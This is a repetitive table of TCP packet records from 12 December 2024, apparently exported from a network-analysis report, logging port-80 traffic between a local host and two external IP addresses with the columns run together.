                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.985493898 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.985564947 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.986502886 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.986551046 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.986587048 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.986607075 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.987586975 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.987637043 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.987873077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.987921000 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.988589048 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.988634109 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.988665104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.988712072 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.989734888 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.989792109 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.989943027 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.990060091 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.990770102 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.990822077 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.990884066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.990926981 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.991794109 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.991867065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.991941929 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.992003918 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.992887020 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.992933989 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.993175983 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.993244886 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.993949890 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.994020939 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.994255066 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.994303942 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.995024920 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.995070934 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.995188951 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.995234013 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.996082067 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.996185064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.996599913 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.996640921 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.997163057 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.997208118 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.997296095 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.997345924 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.998245001 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.998290062 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.998294115 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.998330116 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.999370098 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.999413967 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.999741077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:38.999788046 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.000519991 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.000571012 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.000858068 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.000941992 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.001486063 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.001499891 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.001549006 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.001560926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.002499104 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.002549887 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.003407955 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.003454924 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.003607035 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.003618002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.003665924 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.004671097 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.004717112 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.005289078 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.005378962 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.005719900 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.005788088 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.006700993 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.006750107 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.006836891 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.006880045 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.006886959 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.006917000 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.008160114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.008217096 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.008979082 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.009001017 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.009021044 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.009021044 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.009046078 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.009061098 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.010083914 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.010162115 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.010633945 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.010678053 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.011066914 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.011111975 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.011917114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.011956930 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.012198925 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.012212992 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.012252092 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.013267994 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.013314009 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.013673067 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.013715029 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.014269114 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.014314890 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.015383005 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.015394926 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.015431881 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.015686989 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.015728951 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.016447067 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.016496897 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.016505003 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.016570091 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.017597914 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.017652988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.017669916 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.017708063 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.018580914 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.018641949 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.019176960 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.019268036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.019740105 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.019752979 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.019794941 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.020940065 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.020988941 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.021828890 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.021879911 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.022636890 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.022682905 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.022826910 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.022980928 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.023720026 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.023797989 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.024003983 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.024048090 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.024213076 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.024224043 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.024259090 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.025094032 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.025108099 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.025146961 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.025166988 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.026072025 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.026120901 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.026175022 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.026217937 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.027069092 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.027160883 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.027192116 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.027204037 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.028244972 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.028300047 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.028784990 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.028835058 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.029251099 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.029298067 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.029370070 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.029428959 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.030373096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.030425072 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.031513929 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.031527996 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.031557083 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.031574011 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.031574011 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.031605005 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.032449961 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.032500029 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.032725096 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.032870054 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.033587933 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.033641100 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.033689022 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.034645081 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.034688950 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.034697056 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.034728050 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.035717010 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.035761118 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.035914898 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.035955906 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.036851883 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.036864042 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.036905050 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.036923885 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.037798882 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.037847042 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.038070917 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.038125038 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.038865089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.038917065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.039249897 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.039288044 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.040002108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.040050030 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.088836908 CET8049938185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.088944912 CET8049943185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.089025974 CET4994380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.089097977 CET4994380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.176557064 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.176600933 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.176676035 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.177102089 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.177201986 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.177346945 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.177391052 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.178083897 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.178129911 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.178461075 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.178505898 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.178937912 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.178985119 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.179646015 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.179702044 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.179759979 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.179799080 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.180627108 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.180672884 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.180826902 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.180871964 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.181637049 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.181763887 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.181811094 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.182801962 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.182852030 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.182950020 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.182997942 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.183845043 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.183898926 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.183928013 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.183975935 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.185034990 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.185090065 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.185162067 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.185209036 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.185992002 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.186037064 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.186332941 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.186381102 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.187041044 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.187092066 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.187176943 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.187222004 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.188106060 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.188154936 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.188224077 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.188271046 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.189182043 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.189230919 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.189299107 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.189343929 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.190238953 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.190315962 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.190468073 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.190578938 CET4993180192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.191596985 CET804993131.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:39.191647053 CET4993180192.168.2.1031.41.244.11
